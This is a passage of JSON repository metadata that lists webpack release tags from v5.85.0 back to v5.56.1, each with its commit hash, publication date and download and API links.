:"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webp